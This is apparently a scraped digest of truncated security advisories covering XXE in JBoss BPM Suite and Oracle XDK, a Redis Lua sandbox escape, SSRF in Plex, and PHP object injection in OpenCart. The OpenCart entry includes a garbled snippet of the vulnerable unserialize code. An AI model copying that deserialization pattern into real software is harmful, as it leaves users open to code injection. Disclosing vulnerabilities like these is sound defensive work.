CVE-2015-1818

XML external entity XXE vulnerability in the dashbuilder import facility DocumentBuilders in org.jboss.dashboard.export.ImportManagerImpl in Red Hat JBoss BPM Suite before 6.1.2 allows remote attackers to read arbitrary files, conduct server-side request forgery SSRF attacks, and have other...

redis -- EVAL Lua Sandbox Escape

Ben Murphy reports: It is possible to break out of the Lua sandbox in Redis and execute arbitrary code. This shouldn’t pose a threat to users under the trusted Redis security model where only trusted users can connect to the database. However, in real deployments there could be databases that can...

Xxe

Unspecified vulnerability in the XML Developer's Kit for C component in Oracle Database Server 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors. NOTE: the previous information is from the January 2015 CPU. Oracle has not...

CVE-2014-6577

CVE-2014-6577 is an Oracle Database Server issue affecting the XML Developer's Kit for C component. Versions 11.2.0.3/11.2.0.4/12.1.0.1/12.1.0.2 are affected. The vulnerability is described as an XML external entity (XXE) issue in the XML parser that could allow a remote, authenticated user to af...

CVE-2014-9304

Plex Media Server before 0.9.9.3 allows remote attackers to bypass the web server whitelist, conduct SSRF attacks, and execute arbitrary administrative actions via multiple crafted X-Plex-Url headers to system/proxy, which are inconsistently processed by the request handler in the backend web...

OpenCart 1.5.6.4 PHP Object Injection Vulnerability

Exploit for php platform in category web applications OpenCart session-data'cart' as $key = $quantity $product = explode':', $key; $productid = $product0; $stock = true; // Options if !empty$product1 $options = unserializebase64decode$product1; else $options = array; The vulnerability exists...